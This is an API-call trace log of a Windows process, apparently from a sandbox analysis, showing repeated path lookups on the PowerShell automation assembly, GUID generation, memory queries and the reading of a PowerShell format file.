	[0692.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.336] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x29de373b, Data2=0x1686, Data3=0x40cb, Data4=([0]=0x8c, [1]=0xb2, [2]=0x13, [3]=0x99, [4]=0x2, [5]=0x9d, [6]=0xd2, [7]=0x72))) returned 0x0
	[0692.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.341] VirtualQuery (in: lpAddress=0x14b600, lpBuffer=0x14c4c0, dwLength=0x30 | out: lpBuffer=0x14c4c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0692.342] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0692.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.343] VirtualQuery (in: lpAddress=0x14be10, lpBuffer=0x14ccd0, dwLength=0x30 | out: lpBuffer=0x14ccd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0692.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.345] VirtualQuery (in: lpAddress=0x14be10, lpBuffer=0x14ccd0, dwLength=0x30 | out: lpBuffer=0x14ccd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0692.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0692.348] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x4dcf143d, Data2=0x2bc2, Data3=0x402f, Data4=([0]=0x8f, [1]=0x38, [2]=0xe8, [3]=0x61, [4]=0x2a, [5]=0x57, [6]=0x93, [7]=0xf))) returned 0x0
	[0695.710] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xc4fa6714, Data2=0x5e7d, Data3=0x45ad, Data4=([0]=0x93, [1]=0x55, [2]=0xa5, [3]=0xc8, [4]=0x49, [5]=0xf2, [6]=0x6b, [7]=0x6d))) returned 0x0
	[0695.710] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xc2c8f0d5, Data2=0xa548, Data3=0x40be, Data4=([0]=0xa5, [1]=0xa1, [2]=0xdc, [3]=0xef, [4]=0x1a, [5]=0xfb, [6]=0x45, [7]=0xbd))) returned 0x0
	[0695.713] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x6601081e, Data2=0x7685, Data3=0x4289, Data4=([0]=0x83, [1]=0xc6, [2]=0x57, [3]=0x99, [4]=0xa0, [5]=0xf1, [6]=0x7a, [7]=0x87))) returned 0x0
	[0695.713] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x48f9cedf, Data2=0x6a4f, Data3=0x4411, Data4=([0]=0xa9, [1]=0x2f, [2]=0xf1, [3]=0x7d, [4]=0x37, [5]=0xa6, [6]=0x75, [7]=0x9d))) returned 0x0
	[0695.714] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x70141a1, Data2=0x198d, Data3=0x420b, Data4=([0]=0xa9, [1]=0x18, [2]=0xc2, [3]=0x77, [4]=0xee, [5]=0xc6, [6]=0x89, [7]=0xe5))) returned 0x0
	[0695.714] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x760cf513, Data2=0x8819, Data3=0x4062, Data4=([0]=0xaa, [1]=0x57, [2]=0xd1, [3]=0x8f, [4]=0x8a, [5]=0xdb, [6]=0x64, [7]=0x47))) returned 0x0
	[0695.714] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x610b343e, Data2=0x43f9, Data3=0x49c5, Data4=([0]=0x97, [1]=0x7d, [2]=0x29, [3]=0xce, [4]=0x51, [5]=0xb5, [6]=0x41, [7]=0x8d))) returned 0x0
	[0695.714] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x2595cda7, Data2=0xace5, Data3=0x403d, Data4=([0]=0x97, [1]=0x2e, [2]=0x64, [3]=0x3f, [4]=0x47, [5]=0x7f, [6]=0x89, [7]=0xf9))) returned 0x0
	[0695.714] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xeb8e899, Data2=0x5131, Data3=0x4363, Data4=([0]=0xbe, [1]=0x27, [2]=0x9, [3]=0xd, [4]=0x67, [5]=0xb0, [6]=0x3d, [7]=0x8a))) returned 0x0
	[0695.715] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x2701dd57, Data2=0xe412, Data3=0x4ed6, Data4=([0]=0xb0, [1]=0x66, [2]=0xe8, [3]=0xbb, [4]=0x53, [5]=0xcd, [6]=0x16, [7]=0xc5))) returned 0x0
	[0695.715] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x71895924, Data2=0xb23f, Data3=0x4336, Data4=([0]=0xa1, [1]=0xb5, [2]=0xc, [3]=0x79, [4]=0x4c, [5]=0xb6, [6]=0xb6, [7]=0x56))) returned 0x0
	[0695.716] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x2e2016e9, Data2=0xe4da, Data3=0x4b90, Data4=([0]=0x84, [1]=0x1d, [2]=0xe8, [3]=0xe7, [4]=0x24, [5]=0xd2, [6]=0x6c, [7]=0xf4))) returned 0x0
	[0695.717] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xbc0c207a, Data2=0xd912, Data3=0x4cd4, Data4=([0]=0xaf, [1]=0xcf, [2]=0x35, [3]=0x18, [4]=0x32, [5]=0x37, [6]=0xca, [7]=0xc0))) returned 0x0
	[0695.718] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xd2e580fe, Data2=0x6451, Data3=0x447b, Data4=([0]=0xbe, [1]=0xc3, [2]=0x8e, [3]=0x2a, [4]=0x56, [5]=0x6, [6]=0x3b, [7]=0xd2))) returned 0x0
	[0695.718] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xe4868c89, Data2=0x37cd, Data3=0x477e, Data4=([0]=0xb0, [1]=0xad, [2]=0x85, [3]=0x2d, [4]=0xc4, [5]=0x39, [6]=0x66, [7]=0xf))) returned 0x0
	[0695.718] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xb879f47a, Data2=0x221d, Data3=0x4f3f, Data4=([0]=0xaa, [1]=0x8a, [2]=0x92, [3]=0x5, [4]=0xa0, [5]=0x6b, [6]=0x7, [7]=0x1a))) returned 0x0
	[0695.719] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xb7b1c70a, Data2=0x2791, Data3=0x49d8, Data4=([0]=0xbb, [1]=0xea, [2]=0xa3, [3]=0xac, [4]=0x66, [5]=0x98, [6]=0x6c, [7]=0x7d))) returned 0x0
	[0695.719] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xc82db196, Data2=0x73db, Data3=0x4183, Data4=([0]=0xb3, [1]=0xe3, [2]=0xe6, [3]=0x4c, [4]=0xb7, [5]=0x9e, [6]=0x27, [7]=0x78))) returned 0x0
	[0695.719] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x430a3cda, Data2=0x9d67, Data3=0x4596, Data4=([0]=0xa0, [1]=0xd8, [2]=0x1e, [3]=0xf8, [4]=0xdd, [5]=0x98, [6]=0x35, [7]=0xaa))) returned 0x0
	[0695.719] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x3d16c847, Data2=0xe3ef, Data3=0x43c7, Data4=([0]=0xa0, [1]=0x9e, [2]=0xe7, [3]=0xf6, [4]=0xa4, [5]=0x17, [6]=0xdc, [7]=0xf2))) returned 0x0
	[0695.720] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x57cbf435, Data2=0xefb6, Data3=0x469d, Data4=([0]=0xb6, [1]=0xc5, [2]=0xfd, [3]=0xd9, [4]=0xa7, [5]=0xc7, [6]=0x80, [7]=0x25))) returned 0x0
	[0695.720] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0695.720] GetFileType (hFile=0x2f4) returned 0x1
	[0695.720] SetErrorMode (uMode=0x1) returned 0x1
	[0695.720] GetFileType (hFile=0x2f4) returned 0x1
	[0695.720] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.721] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.721] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.722] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.722] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.722] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.722] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.723] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.723] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.724] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.724] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.724] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.724] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.725] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.725] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.725] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.725] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.726] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.726] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.727] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.727] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0695.728] ReadFile (in: hFile=0x2f4, lpBuffer=0x304c728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x304c728*, lpNumberOfBytesRead=0x14d338*=0xe67, lpOverlapped=0x0) returned 1
